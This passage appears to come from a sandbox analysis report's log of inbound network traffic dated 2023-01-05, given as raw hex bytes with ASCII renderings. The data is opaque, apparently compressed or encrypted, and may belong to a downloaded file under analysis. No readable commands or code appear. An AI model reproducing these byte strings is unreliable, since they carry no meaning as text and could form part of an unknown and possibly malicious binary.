c8 cc 38 ad 3f a7 c3 38 c9 07 ff e3 91 52 Data Ascii: p]56X4!\ya.VZuB=/.uR;NlQmJ<zo& kfNh[TV4fbRsG[9VK.7TC$7gGvGZQtZ5sf\|1&Qiuk7`!_i#0NTtA7,8?8R
2023-01-05 12:18:10 UTC	293	IN	Data Raw: 7a 3e 54 4e af 53 f4 86 45 cb 93 e7 a5 15 c4 de af ec ca 8f b9 5f 49 2b 38 e7 7e 85 76 c8 9d 2e 6b 5a 1c 42 01 18 eb 86 74 15 e7 47 6f 7d 0d a3 51 33 2f 1b bb ec d4 f6 11 15 f0 05 fd 2c 97 a3 53 d6 cf a4 8a e1 62 e2 f8 99 8a 02 50 02 47 d6 52 cb e8 00 f2 8b 46 f8 a8 f7 0d 82 dd 70 9e 6c 56 43 c5 67 50 54 83 ca cc 53 79 1c 03 f2 03 28 7d 8d 42 83 6e f2 fc 4f 61 d4 ff 84 ef 86 72 ca d6 19 80 dc 6c e8 8a 80 2e f6 16 04 5c 7b 01 c0 d4 d7 6e 32 78 c5 ea cf 0d 5c dd 7f 33 b7 1d bd 28 46 d0 40 1d 74 38 02 4b 2c 68 b1 7c 78 af 21 c3 60 70 f6 6d 35 c9 7d 1e 52 07 65 3f 89 36 e7 cb 9d 7d db 20 06 76 c5 d0 6d e8 c4 5d b6 8a 43 2a bf 54 1c 1a e1 17 35 dc 32 cd 32 d0 68 e4 af 1d 68 b4 0a c9 45 ea 84 0e 66 6b 7d a6 dc 22 1f 42 9f 04 43 e8 93 00 32 99 53 a9 d4 b8 6c 90 Data Ascii: z>TNSE_I+8~v.kZBtGo}Q3/,SbPGRFplVCgPTSy(}BnOarl.\{n2x\3(F@t8K,h\|x!`pm5}Re?6} vm]C*T522hhEfk}"BC2Sl
2023-01-05 12:18:10 UTC	309	IN	Data Raw: 9b bd b4 88 cc bf 81 9e d1 94 4b d5 19 f0 5d 85 ef c7 f1 7b 45 26 6c 32 92 65 28 da 20 97 59 25 78 1d e0 ad a8 4f fc 07 b4 60 35 c8 d5 c5 e1 b9 bf 6a e4 7e 49 8f 08 47 8c db f3 47 b9 e5 e1 ea 1e c6 fd c0 c0 b6 eb d0 13 cf 86 cb 74 1f 3c 19 b2 70 8a b9 e1 99 d8 30 f1 7a fb 06 eb f5 87 b9 07 5e c1 1b 0e e6 79 e7 63 a0 0e 3d 68 91 cb af 9e 9f b5 ba 5b cf 3a 49 cf ba 2d 26 2b ca 40 67 50 97 cc 3e 83 47 15 4e f9 12 8b 49 db df 55 ea 17 c0 75 02 61 a2 6a 29 36 20 7a 56 e7 01 e0 9b 1b b9 ba eb 23 5e d6 27 91 37 80 1b 91 4f a0 57 a3 4c 88 6d 31 53 47 e5 93 dc 24 be 8c 1a 4e c1 0f c9 f4 03 75 56 de 64 c5 88 33 d4 62 fe 09 74 57 7e 4a 16 32 51 58 d5 c3 aa a4 a2 c2 06 06 0d b0 69 dd a5 be 44 0f b9 5e 07 e7 14 7e 7e d9 70 2e 38 7f 30 44 c1 b9 ea 62 e6 f4 9d ab 43 8b Data Ascii: K]{E&l2e( Y%xO`5j~IGGt<p0z^yc=h[:I-&+@gP>GNIUuaj)6 zV#^'7OWLm1SG$NuVd3btW~J2QXiD^~~p.80DbC
2023-01-05 12:18:10 UTC	310	IN	Data Raw: ef e0 1e 08 e2 24 22 3f e1 ab 91 39 4b f0 fd e8 d6 55 65 ca 7b 05 e8 a4 28 57 24 66 ce bf 8d 3a 15 b3 cb 05 76 71 28 99 7b 70 0d 3a 60 aa ce 30 00 3b 33 d2 9a 99 0d 60 6b 1e 3d d8 36 92 7c cc 2c 3f f7 58 13 b5 6c e9 b5 43 d8 28 ee c1 59 df 9b d3 ac ec 07 4c 97 8b 52 03 f7 df 85 e6 bc b9 4b 31 3d 1e 90 fa b2 f5 c2 d5 9f a7 ab 3f 4f 5b 45 be a5 6c a5 2d 0e 13 fa d6 e1 30 ad 52 1a b8 ba 0f 91 d6 90 db b9 ba 3f d0 80 91 ab db c4 02 fc 7c 7c f3 ef 35 6a e0 d8 02 79 aa 18 9e ca 3d f8 5b e3 f7 36 a4 a8 67 1e aa d6 54 a4 cb ae 8c da b3 a8 57 cf f9 81 ee 1a ea 60 ca e3 91 91 5c 9d 06 5c 19 9a 66 2e 45 ea e9 bb 1d 71 fd 41 0a 18 d0 08 c1 0e 1c 97 3e f1 7b 16 41 35 a5 c5 55 bd b0 37 25 b3 87 81 c1 02 3a c7 72 fd 08 73 15 d1 5c b3 eb 82 fc 01 3d 95 69 54 aa 3b a8 09 Data Ascii: $"?9KUe{(W$f:vq({p:`0;3`k=6\|,?XlC(YLRK1=?O[El-0R?\|\|5jy=[6gTW`\\f.EqA>{A5U7%:rs\=iT;
2023-01-05 12:18:10 UTC	326	IN	Data Raw: 3b 62 a9 74 a1 9f 0a c8 5e 8d 21 be 6e 10 7b c4 02 67 88 ba c3 37 6f 36 e0 1d a7 8e 00 ed 31 00 8d e2 8e 23 40 b1 24 c0 5b ae 01 fa e3 4b fe 9b 7e 8b ac d0 74 be f0 28 51 2e dd 40 1b 54 03 fe 66 c8 2f ee 16 55 45 b2 e6 96 e2 5d 3c af 0b f1 5b be 6d c8 6e bc 5b ea e5 36 b7 70 08 b8 b5 cb 1b a2 fc f2 38 04 fa ea 2c fc f1 8b de d3 fb ce c2 f3 78 a1 a7 1d 3a 9e e7 c2 9f 08 3d 46 e0 17 73 dd e7 80 fd 36 c4 0a 0d fd 61 db 2b 97 51 37 b0 2b a2 07 ca df 19 d1 9a 9e 43 9f 8e 47 05 af cf 69 36 b5 6e 64 1b b1 0b 2c fc 11 8f eb d8 b7 14 ef 86 fa f4 8b ae f6 d9 7b 19 7f 55 bf 33 dc c7 43 2c df 43 f8 71 c5 1a 68 c9 d1 7b a0 dd da 0f 8c f2 f0 7b 7a 12 fd b4 e1 51 7b cc 55 de 6f ed f5 25 23 b0 65 58 63 8a 0b 3c 89 7d 57 49 7c 9d df d3 78 fe c6 fe 47 dd 0f cd 6f 61 bd 41 Data Ascii: ;bt^!n{g7o61#@$[K~t(Q.@Tf/UE]<[mn[6p8,x:=Fs6a+Q7+CGi6nd,{U3C,Cqh{{zQ{Uo%#eXc<}WI\|xGoaA
2023-01-05 12:18:10 UTC	327	IN	Data Raw: 67 d7 23 20 7d 27 38 7a 03 ee c5 e0 10 13 6c 74 8f d1 92 df 45 25 d0 11 ac 0d ad 95 87 b0 92 86 54 41 71 25 03 25 66 fa fd 0a fb 85 27 a3 03 c3 e9 df 30 a8 b1 36 a5 b4 c6 4c 5b b0 b6 e2 02 47 66 e2 ae 40 01 1e 1d 57 30 8f 53 e8 01 db 83 27 0e 03 25 63 c8 27 66 05 46 03 c3 03 65 8c e1 48 0a 75 8a a5 de 71 e0 11 54 ce 3c ae a6 f4 3f d2 75 17 38 d7 01 fd 30 ea 88 fd 8f ae 78 35 81 06 d3 f1 84 3e 30 19 59 17 8b ac d4 23 8c 7a 0c b7 58 01 4f da ab 6f fd e8 f7 e9 1d 8f e3 f6 93 60 3d e2 f7 e9 49 8f 3f ed 67 fd d6 6c 6b 06 d6 ea 2d bf f4 f4 d8 86 fb 9f 76 3b 8b bd 6a 40 8a 47 71 c7 a3 98 79 da 72 8b 6b 9b 3d eb 45 0d b7 bd 2d b9 b0 f1 cb 1e 72 b9 ae d3 6b 7f c1 8a ca 7e 7d a9 f6 06 5d 63 7f 89 0c 75 ea 1b f8 8d b5 bf e8 97 f3 05 bc f2 86 97 7a 60 77 6b 60 0f fa Data Ascii: g# }'8zltE%TAq%%f'06L[Gf@W0S'%c'fFeHuqT<?u80x5>0Y#zXOo`=I?glk-v;j@Gqyrk=E-rk~}]cuz`wk`
2023-01-05 12:18:10 UTC	343	IN	Data Raw: 33 b6 c4 fc 1d 7c 34 e3 82 f2 e3 3d ed 8f 7e 57 07 e5 11 38 3c bd ee 9d 0b 4a cd a2 5b 2f 7d 30 19 f2 af 2f e8 58 53 77 41 f9 e0 88 b0 9a aa cf 20 ff db 57 f5 cd 1d 70 51 b9 db 7e 33 bb 4f 33 88 ff 76 8f e3 2f e8 2f 2a df 30 8c 38 f4 e9 e3 b5 0a e2 39 ea d1 c4 8f 2e 2a ff c8 d0 de 9c 97 fe 9d 82 74 09 fc f0 a9 5f 2e 2a bf 1d 7f ca 77 64 b3 3e 63 5d cf bf 8b bf 25 70 3e 45 f8 da 25 15 57 1c ee d6 0f 4d 7c 5f d7 f1 34 b8 bf 1b 90 9f eb af 6d f4 bd 5e fa 54 9d 56 8a e8 cf cf ed fb 73 64 3b ba 86 27 1d 58 f0 66 22 7e 37 78 c6 17 ed 7b 0d f9 b5 d7 ff f6 f3 fb 77 0e bc ba 33 c0 fe 50 f8 d8 85 fd 35 3e 2f 79 57 a5 2c 7a 68 4e d1 ee a0 aa c3 0f bd 72 a6 d9 9c bb ca 5b 2b bb 3c f1 e6 47 9d c2 1f fa 2c ff cc f5 79 d7 37 7b 47 0c da ac 9f f7 88 92 34 f9 5c 68 55 de Data Ascii: 3\|4=~W8<J[/}0/XSwA WpQ~3O3v//089.t_.*wd>c]%p>E%WM\|_4m^TVsd;'Xf"~7x{w3P5>/yW,zhNr[+<G,y7{G4\hU
2023-01-05 12:18:10 UTC	344	IN	Data Raw: 6b 81 05 c6 a7 1a 9f 98 47 5b d5 28 9f 0c 9a fa e0 a3 39 50 de 75 7f 3e 5c 14 5b a3 dc d9 fe cb 2f 5f 9a 03 ed b1 bc f7 b4 21 cf d6 28 3f f9 6d f3 82 53 6a 48 df c6 39 0f cc dd 59 a3 1c ba 25 6c a9 ea 32 e4 b7 fc f0 fe 93 0d 35 ca a2 d7 af dd 6c fb 10 b4 f7 82 ad df 0e 0e 3f a4 2c f9 aa 4f a4 a0 80 f4 94 ea ba be 3a ef 90 72 e5 ac d0 de 85 d7 a1 fd cf a8 08 9b b7 ee 90 f2 89 45 0d e9 e3 0e 8e 05 79 a3 3b 9e ae 3f a4 3c d7 d6 f7 c1 41 33 60 fe 8d 8d 9c dc b6 ef 61 e5 9d 5e 6b 82 fd 9f e8 08 f2 da bd 97 9e 7e 58 d9 be ab ef a0 6e 95 30 5f 9c 88 aa 9a bb e2 b0 b2 f0 e1 37 2a 74 a3 60 7e 29 6a 9d b7 e5 bb c3 ca cd de 7e df 9e fd 79 34 b4 87 af df ff c2 f7 88 72 e8 89 f5 5d 57 be 38 72 ac db f1 4b 32 fe 51 9c 22 c7 fa ba 53 32 ac 2d 92 63 55 2f 39 96 7d 7b 52 Data Ascii: kG[(9Pu>\[/_!(?mSjH9Y%l25l?,O:rEy;?<A3`a^k~Xn0_7*t`~)j~y4r]W8rK2Q"S2-cU/9}{R
2023-01-05 12:18:10 UTC	360	IN	Data Raw: 29 6b 8e 00 7e 3e e6 fa a2 e9 89 53 8a 92 6b 4e 02 1e 31 5e e2 b1 e7 80 df 86 5d 35 e7 01 57 4c b5 9e 68 51 64 fd cb d9 9a ab 80 bf bf b8 e1 52 af fa 80 bd e5 35 25 80 67 95 9f 2c ac 3d 18 d2 f0 a6 a6 1c 70 97 3b 7e 0e 55 e9 73 0b df a9 ad 04 3c a1 36 32 6d 5f bf 1b ab 86 d7 fe 0a 38 7a 83 87 dd c7 9e b3 6f 39 d7 be 06 9c 77 65 e7 be d4 dc c0 4d c2 da 5a c0 3f 24 fd fe 51 c8 80 8d cf c3 6b db 80 ee 8b 3f 7f d9 e4 f4 69 57 f7 af ad ed 02 78 de f5 a3 8b 42 df 9d f0 d5 c1 da 1e 80 3f 9d 5b 33 63 ec 6a ab 73 3f d4 7e 00 78 56 d6 17 e3 14 cf d7 a6 fd 52 3b 10 f0 25 fb af 06 fd 10 1b 74 97 a9 1b 0e f8 f5 ba d3 eb ae 15 c5 6d ed 53 37 1a f0 e3 dc a1 bd b2 3a 8d ae 1a 53 37 01 70 ca a1 31 43 6b bc c7 1d 72 ab 73 02 3c 7e d2 c5 e2 8a 92 cb 31 7e 75 ae 80 0b ae dd Data Ascii: )k~>SkN1^]5WLhQdR5%g,=p;~Us<62m_8zo9weMZ?$Qk?iWxB?[3cjs?~xVR;%tmS7:S7p1Ckrs<~1~u
2023-01-05 12:18:10 UTC	361	IN	Data Raw: ca 19 8b d1 80 1d f2 93 37 6e ea 35 aa e4 be c5 04 c0 df f4 f9 f9 48 46 59 ef cd 7f 59 38 01 2e 0d a9 28 90 9f 5e fb a2 5b 1b 57 c0 7e bf ff 91 3d de 3c fe db a1 6d e6 e8 c4 44 d7 da b6 0f 19 2e ec fa 7b c1 ec 8e eb 7b 9f f7 6f 9f fa da 37 60 4c 8e e8 d9 f6 35 e2 cd 23 13 ca ba ee c8 2f 0f fd f0 d9 ed 1f 13 4a 8b d7 0d 73 3d da f1 94 e6 e0 f2 f6 23 f2 9f a4 f7 3d 9d 26 b6 3a d6 f7 25 e7 80 ef 17 81 c7 5f 3d 74 28 8c 89 28 b9 6f fd a2 f2 81 ff ec bc 92 d7 97 62 6f 45 cf cd 92 75 3f b3 db 4f 1c 56 ed 55 f7 eb 15 c9 ca 59 9e 66 3d 4a 65 ed 44 a2 89 dd fe fe cb b2 c3 aa cb 1c f9 f8 c5 56 52 d7 4a 87 25 b7 95 81 de db 6e 56 5a 4c 70 29 69 c3 ab 8b b5 2c f6 cb eb 94 f3 f7 ee bc 31 b2 ac 43 53 ee 5c 39 51 36 b9 fa 64 ee cf b2 7b 23 d5 9e 15 53 8b 2c ef 94 7f 39 Data Ascii: 7n5HFYY8.(^[W~=<mD.{{o7`L5#/Js=#=&:%_=t((oboEu?OVUYf=JeDVRJ%nVZLp)i,1CS\9Q6d{#S,9
2023-01-05 12:18:10 UTC	377	IN	Data Raw: d8 9d 1b c4 4d e7 9e 73 c5 dc 67 70 0f 7b 7e be b0 42 30 13 eb 8b a2 d8 4e 9c 2d c6 88 cb f1 6a 5d b1 d8 4e f2 97 42 41 c3 d3 a4 13 d2 75 69 9c bc 5d de 23 67 40 ff 5e 91 9f c8 4b a0 e2 6d 54 43 b8 09 5e 27 f0 24 6e 90 02 65 cb 34 62 ee 30 0f 98 22 e6 35 33 0b 5c 6d 29 bc 77 32 bb 99 dd cd 1e 60 ef b1 6e dc 14 be 2a b8 cd 70 81 17 d7 48 1f e5 8a 4a be a2 6f fa ea eb 13 fd 89 63 c4 2b a2 26 99 40 a5 50 f7 28 2b 48 9b b5 18 4f 76 18 50 16 cd 0f 14 66 08 26 b2 85 5c 45 ae 21 37 56 9b 03 9f 88 aa 21 d1 c4 e0 a8 5f ab c7 d6 00 2e 1b cb 5f c7 ce f6 8c 7f 28 9a 69 96 9a ad 56 13 b4 dc 90 66 82 d7 fc ee 00 41 bc 44 6f 41 99 8d 89 3a 44 0c 8c d2 2a 32 11 fa a2 1f 55 8e b1 62 aa 33 b5 19 bd b6 da b0 ee ec 04 f6 36 64 bc 51 dc 44 2e 8c 5b c9 ed e0 2d a5 a9 f2 5c 20 Data Ascii: Msgp{~B0N-j]NBAui]#g@^KmTC^'$ne4b0"53\m)w2`npHJoc+&@P(+HOvPf&\E!7V!_._(iVfADoA:D2Ub36dQD.[-\
2023-01-05 12:18:10 UTC	378	IN	Data Raw: 35 c2 3c d7 57 f3 07 87 9d 00 44 b7 44 4b d4 36 68 67 b5 b7 da 57 cd e0 60 6a c8 d7 f7 b0 d1 54 b4 03 c6 fb 05 e8 83 35 e1 42 28 44 47 a2 1b d1 1b 7c 75 28 10 46 14 4e 1a 29 c4 3e e2 24 64 8d 02 e2 19 f0 5b 25 92 23 db 92 dd c9 3e e4 40 32 80 1c 0d 29 63 2d 79 1a 92 c5 15 f2 11 38 ad 25 35 97 7a 4f d5 86 0a ed 4a df 60 26 b3 53 b8 99 dc 3c d0 fe 0c ce 0c 98 69 2e f4 4c 02 9f c4 a7 f0 db a0 76 4a f8 cf 7c 65 a1 96 e0 24 30 82 28 f4 11 7c 85 21 e0 6a ab 84 64 20 ef 67 40 dc b5 81 b5 5b 89 23 61 7c f5 3d 9f 8b e2 3b d1 4c aa 8f 15 99 97 15 b9 bd dc 45 ee 81 93 fc 14 d9 5d 99 a4 4e 53 a3 81 6f 37 a8 bc f6 18 f3 93 29 de bf 1f 81 06 12 df c9 03 d4 25 ea 26 b0 e3 56 3a 8d 3e 04 c9 e5 34 9d 43 5f a3 0d 40 87 bb 19 77 b6 33 38 bf 0f db 99 1f 0a c7 b7 52 8a 06 02 Data Ascii: 5<WDDK6hgW`jT5B(DG\|u(FN)>$d[%#>@2)c-y8%5zOJ`&S<i.LvJ\|e$0(\|!jd g@[#a\|=;LE]NSo7)%&V:>4C_@w38R
2023-01-05 12:18:10 UTC	394	IN	Data Raw: f6 8f 9c 3f 62 d4 c6 e9 ee 0d 1c 2a 3b bf 1e db a2 ba c3 0b 97 fe 73 2d 89 97 5b 17 3b 5d 7c dd ff 48 bf 1a e2 c4 87 9b 83 16 3c 3f fb c9 e8 c4 9b a5 15 6b 9c 4c 99 6f 6d 67 b4 36 36 a7 f5 dc 43 ed eb b7 09 33 7b 61 37 7b c9 1b eb cd d1 a6 d5 bd 8f 9d 5e 42 1d ef c1 2e b9 e3 15 67 f9 ca af a9 97 d3 ce 19 b5 5d 6c 86 ef 76 da d9 f1 66 c8 55 17 d3 46 eb 42 df 57 36 5a d7 ed f1 bd e8 f6 71 75 4d 6f f4 75 ea 98 94 eb a6 f5 46 db 8b 56 1f 78 61 7d 75 db ca 8b 2d 5a 4f 0d 1c 31 c1 21 af c2 1b 79 d3 cc 1e 6b 86 de 58 66 d1 7a 29 8a 2c 37 19 45 9a 0d 2e b3 00 cb 41 15 63 2f 63 bf 32 d1 8b e5 77 e5 8f 88 fe 6f 91 56 12 a1 32 69 6d fa e7 cf bb 8f 19 03 7f 09 ea 7b f8 d0 e1 7e 83 42 86 38 b4 1a 1f 12 30 26 78 78 c8 a4 5f 26 00 7f 72 88 07 27 80 20 a8 9b 00 8b bf 24 Data Ascii: ?b*;s-[;]\|H<?kLomg66C3{a7{^B.g]lvfUFBW6ZquMouFVxa}u-ZO1!ykXfz),7E.Ac/c2woV2im{~B80&xx_&r' $
2023-01-05 12:18:10 UTC	395	IN	Data Raw: e3 5a 06 84 8c 42 ae bf 5e c0 18 d1 75 49 87 3a 06 0f c3 10 c3 30 c3 20 43 a0 61 a0 21 c8 30 06 fe 3b dc e0 67 98 04 5f 8d 33 84 c0 f7 43 e0 e7 a3 e0 df d1 f0 7f 2d 1d ea fc 95 fb 0e 7b 33 6b 43 7c be d7 a4 5a 2d af e4 86 0c 6b b0 aa c2 b2 ca f7 fd 16 af 68 bd 6c ea e5 49 56 b1 c7 87 0c 6c e9 ac 7e 3c 19 7c 69 d4 8c 6f 47 b5 42 cb b3 d2 b1 f6 9b d7 bf 1d 7e db ef 58 03 66 c3 f2 fe 43 a2 62 a7 ce 6b e7 d9 33 d7 6a 71 d8 e5 5a 9d ec df ca ad e7 75 cf 49 fb 3a f2 a1 5a ae 65 d3 55 8f 95 da 1b ae ee ad 33 31 4e 78 f0 d4 ff 8c 9b 12 3a b9 e1 db aa 53 37 c6 86 cc 98 5f 72 ae b1 71 bb 66 27 e6 da 1c 4e de 6c 66 b5 ea 45 c0 e7 80 96 4b 13 9b 69 cd 46 7a 77 f0 ab 57 7e f8 e8 be f1 cb 0a 66 94 64 2c 7c db ae f9 dd 52 29 e7 08 f3 6a 74 a3 ed 8f 76 34 79 91 73 e7 6d Data Ascii: ZB^uI:0 Ca!0;g_3C-{3kC\|Z-khlIVl~<\|ioGB~XfCbk3jqZuI:ZeU31Nx:S7_rqf'NlfEKiFzwW~fd,\|R)jtv4ysm
2023-01-05 12:18:10 UTC	411	IN	Data Raw: d2 c6 93 7f 14 34 e8 b6 e2 70 d7 84 36 6a 55 18 6a 36 88 88 a9 16 7e a4 9f 8d 46 13 72 1c 2a e5 38 b4 f6 29 5a 35 59 cf 8d 78 d7 25 03 0c 7e 2e 4d 72 f3 da 92 0e 44 a9 7b af 35 cb 34 79 e1 3a bc b0 79 fa 7c 92 18 41 e6 df 75 0f 99 29 02 de e3 7f 95 c0 fe 74 a5 ca 2f b0 7c bd d3 87 2b 95 04 8f bc 14 4e 0e 60 44 80 a4 cf 50 ed 41 9b 6b 1c b4 12 ee b0 4b 56 54 8a 0c 83 fd 12 ee 53 01 75 b9 6d 00 6c b1 bc 5f 55 e2 97 a5 c3 86 ee 36 d5 f1 5f 2d dd 64 8c 1a 35 f1 28 77 b3 53 35 4a 18 17 35 bd 2e 4b 09 75 b8 6c 3f 66 75 ab 9a 7d e6 1e 5f d8 1b fb b8 9b 5a fc 58 a5 80 dc 1c 8d 4c ea cd a5 49 c1 9c 1a 2b 49 50 67 19 ab e6 e5 59 a8 9b 23 e2 cb 8c 2a f5 56 0e 53 7c 07 10 c4 3c 6d f0 d6 43 da a0 d1 87 65 7c d6 91 aa 1f a9 b4 51 60 26 0f 9b 23 9a 69 62 29 52 4a a7 16 Data Ascii: 4p6jUj6~Fr8)Z5Yx%~.MrD{54y:y\|Au)t/\|+N`DPAkKVTSuml_U6_-d5(wS5J5.Kul?fu}_ZXLI+IPgY#VS\|<mCe\|Q`&#ib)RJ
2023-01-05 12:18:10 UTC	412	IN	Data Raw: cf ff 4b 99 18 68 f2 06 cb 44 af 45 fd 8b de 16 e3 d6 60 a4 37 50 09 c4 0e 8f 37 30 68 0c 58 8f b5 54 72 7d ac be 20 22 a5 d4 8b 78 cd 49 97 4f d2 45 d4 42 fa 95 13 d9 86 79 fd 71 eb c8 fc e2 62 f0 f9 bb e5 f2 ce 10 18 60 4e 7c e0 2d 55 cb 8a c2 02 83 5c 0d 23 f5 37 29 ff aa f3 7d 86 83 48 84 8a 09 a1 16 5e 4a 93 b5 c1 fe 1c 6d 78 d8 bb b8 bd 07 f3 bd 7b 48 be 19 f7 54 71 ba 52 3d 2a cc 5e 6f ff dd df 85 45 e8 70 ee 85 7f e1 e2 0c 4a 11 70 8f f1 dc 17 d9 10 10 27 db 30 6b c7 fa c5 95 40 60 f9 42 37 34 7c ff 59 fb e0 7d 1c 74 ce a2 7e 0c 19 0d 54 00 30 89 33 74 ce 7d 8b da c2 21 d6 4e 94 50 6b 15 a6 82 6d 22 28 dd 17 f6 09 49 59 8e 94 6b 78 bd 6f c0 87 1b 0b 6a cc fa e5 bf 85 d6 3f 11 06 9d a9 99 cc 50 54 4a e4 82 6d 11 60 c0 b9 10 a9 bd 12 44 b5 70 aa e9 Data Ascii: KhDE`7P70hXTr} "xIOEByqb`N\|-U\#7)}H^Jmx{HTqR=*^oEpJp'0k@`B74\|Y}t~T03t}!NPkm"(IYkxoj?PTJm`Dp
2023-01-05 12:18:10 UTC	428	IN	Data Raw: 5f 25 f9 52 04 8c 32 1c 11 ad e1 ac 3f 8e c6 7d 04 a5 76 37 0d 80 83 e4 1d 32 6b 44 ff 16 ae 57 df 5d f6 ba 18 23 10 45 c5 96 24 69 c8 b9 4a d5 c3 eb 9a eb 0b b2 9e 8c bc 3c 3b e2 02 2a f6 ba 11 2b ca f5 a5 69 ea ce 18 a2 04 01 86 92 df 6c 9f 30 15 0a e7 0c ec ba d9 f1 00 9d 0c 56 7f 14 a6 d4 11 37 49 4c ad 90 00 a2 09 70 45 a5 1e 81 9c a6 43 99 95 3e 5a 73 70 55 83 6c 60 47 f1 5b 53 be 39 47 47 43 a1 fb 67 c9 eb c7 b7 14 fc e2 83 ad 6d 19 09 8f 03 24 36 06 84 6e eb e4 00 45 ea e9 af c4 76 62 76 da 52 04 c2 1a 92 6a 8e 44 23 8d aa 56 8c 98 52 96 35 51 59 17 70 a6 cf de 03 15 98 11 4b b9 3f ff dc bc 95 90 50 15 c2 5f 22 99 d0 7b a1 54 fe 22 29 7e ff a0 b7 6b 67 e7 99 44 3b 63 53 d4 1e 6e 3b 3b bb 53 66 a4 02 cf 29 27 f6 37 b6 02 6a 39 53 0a d8 a8 3a 2e b7 Data Ascii: _%R2?}v72kDW]#E$iJ<;*+il0V7ILpEC>ZspUl`G[S9GGCgm$6nEvbvRjD#VR5QYpK?P_"{T")~kgD;cSn;;Sf)'7j9S:.
2023-01-05 12:18:10 UTC	429	IN	Data Raw: ba a1 fa 5b df c3 09 fd 4e 3c cb bc 1f 2d 71 34 b0 a4 9f c7 a5 83 23 de 07 ca db ee e1 18 8f fc 68 38 06 ef ec a2 ba 4e 0d 54 6a f4 8a a0 b2 70 1f 36 a3 e8 95 79 04 c8 99 89 cd 67 8f e5 f3 e9 5d 1d f9 e6 55 76 2f 88 c1 3b 1b ce 97 95 5b 83 67 d9 a5 7c 3d bd 2a e6 c9 f7 23 eb 49 05 8f 1e 38 00 7d 30 12 ee c5 7e e7 7d e0 e8 4d 1b 7a 96 2e ba 2e 22 7d 47 fa 42 9e 02 41 4c e9 6b e7 14 ab 3b 03 59 64 e9 63 6e c9 28 39 d5 1d f9 80 73 8b b4 18 1d eb 39 47 5c c3 b2 39 4c 09 22 a1 88 f6 dd 07 8b c0 ee b2 c0 f7 89 2b 1d 24 db 9f 3e fa 1b 0b 79 a2 5c 94 ef 40 a1 76 c1 c9 c3 85 23 da 43 cd ba 38 4d b5 02 61 14 b4 ab 43 dd b0 02 59 b6 dc 96 64 9f 9b f8 00 c2 15 af 7e f3 7a 08 65 39 d2 1f 78 4c 53 14 eb 54 2b 11 ff 14 61 d6 33 2a ee 3d a5 4b 2b 96 a3 58 d4 45 66 14 77 Data Ascii: [N<-q4#h8NTjp6yg]Uv/;[g\|=#I8}0~}Mz.."}GBALk;Ydcn(9s9G\9L"+$>y\@v#C8MaCYd~ze9xLST+a3=K+XEfw
2023-01-05 12:18:10 UTC	445	IN	Data Raw: 84 d9 88 ae 93 f3 07 50 8b c3 31 a4 18 22 dc 64 2c 68 44 ac ea 8d 56 74 43 c7 93 14 e8 d5 da a3 12 3a 7c 10 b0 49 14 31 12 18 05 be d7 8d 24 dd 4e 6b 6d f2 10 02 d8 74 23 80 a1 bf b2 aa a6 ae 83 a6 62 d9 31 54 f1 93 50 c3 90 fb 97 76 8d d3 d7 f1 e2 72 c4 ea ac fb 65 75 c4 0a 2a e5 48 10 af c5 8a 5f fa 60 01 b8 4a dc 6b b8 4a ae 65 b4 71 7d 2e 85 51 9a 05 87 4c 79 a1 f8 c2 26 42 03 f9 a4 7a d9 69 7c 40 18 25 f4 08 d4 e6 2f 65 8d b0 51 05 80 e1 e9 81 49 e4 ed aa 81 bb e6 30 b0 d7 81 89 7f f8 e3 b4 d6 9b 48 9c be 40 ef af f9 c1 2f 6a d0 1a d4 2e f5 4a d4 5f 74 42 d4 e0 24 9d 1a ec 66 24 d7 ac 2d 1c b9 ed b9 63 8e 58 62 18 cf ea 21 cd 43 43 12 26 94 6b 56 e4 c1 08 34 7c ae c9 0e b8 1c 54 a0 92 29 1e 8c 3f 11 b5 6e aa 38 33 bd 31 64 92 7d 4e eb c2 17 0e 1e 1a Data Ascii: P1"d,hDVtC:\|I1$Nkmt#b1TPvreu*H_`JkJeq}.QLy&Bzi\|@%/eQI0H@/j.J_tB$f$-cXb!CC&kV4\|T)?n831d}N
2023-01-05 12:18:10 UTC	446	IN	Data Raw: 50 2a 8c e2 2c a2 cc ae 81 17 68 d2 ad 7b 86 98 fa 46 8e 7a f2 4c 6b 0c 1a a1 57 90 d9 47 e4 c4 3d 44 0b f9 ec d6 1c b3 a7 31 fe 1b 3e 56 f8 5c d8 ab 56 78 86 55 18 da fd 98 5c 23 1b 40 26 60 4c e6 a2 f4 15 20 2e 66 c1 a5 47 9d b0 80 82 1a 40 6e 82 b8 a6 4f 49 6e e2 64 46 6b 9d 24 65 2e 1b f0 25 6d 77 35 5c 69 5a 56 4a ec a8 84 ef 2c 42 a9 eb fd 6e 7e a4 eb 56 14 ed aa 71 1a 2f 88 fc 6d 0a 37 d4 37 34 41 76 0d 5b db 43 5a a4 e0 98 3e de 42 9f 26 b3 f6 90 36 93 de a2 74 bd c2 54 8c 3b a6 83 c7 dd a4 1a 0a ec 16 5d d6 28 17 b2 95 66 da b7 52 fd 47 43 44 23 0d 41 76 8a 9e 2d e8 fe eb 96 28 e0 1b 76 35 f6 04 ea 10 93 62 8d d2 c6 e0 54 c2 14 ec 8b 5f f8 43 2e 65 2b 57 36 a1 f0 f6 54 30 32 40 04 dd e8 a2 36 03 95 d3 79 0b 51 1a 17 81 ba 54 99 92 24 65 26 58 c0 Data Ascii: P*,h{FzLkWG=D1>V\VxU\#@&`L .fG@nOIndFk$e.%mw5\iZVJ,Bn~Vq/m774Av[CZ>B&6tT;](fRGCD#Av-(v5bT_C.e+W6T02@6yQT$e&X
2023-01-05 12:18:10 UTC	462	IN	Data Raw: d7 47 8d ce 06 cd a6 1b 26 4c 8b f3 84 a1 b3 49 a0 87 f7 6c 30 38 4b 6a e9 e9 7c e3 b7 fe c1 45 22 e4 b3 fe 79 d9 c6 c3 88 4f 67 99 60 e3 d4 ee ec ec b7 bd 7d b5 90 8e b7 82 77 80 73 bd eb b5 57 7b 73 ab f7 8c de f2 f3 d5 d5 b6 b4 a5 b9 83 9d 2c 33 32 03 cc ef 69 9a 2d 7d 03 d9 9a 76 56 56 2f 28 74 53 84 1d 57 22 f7 37 93 70 a6 5b a5 4a 3c 97 f6 8e 58 2d e9 a1 21 b2 90 8c 79 89 bd c2 0c ab 09 8e 56 3b d0 7a 06 71 e5 cc f4 4f a5 ed 03 29 33 25 93 e8 21 33 07 4a 05 a4 07 a7 3c a2 d2 4e d7 d9 fd 7c 08 1a 68 74 68 f1 71 bb b5 54 29 a8 47 e7 95 0a 57 cc 93 71 25 e7 55 5d 29 61 65 aa dd e9 a0 a3 07 fe be 47 0e 21 d0 6e 6d ca d0 e2 fe e8 f8 8f e4 9e 89 da df b5 39 db 4c d7 b7 6e f1 af 02 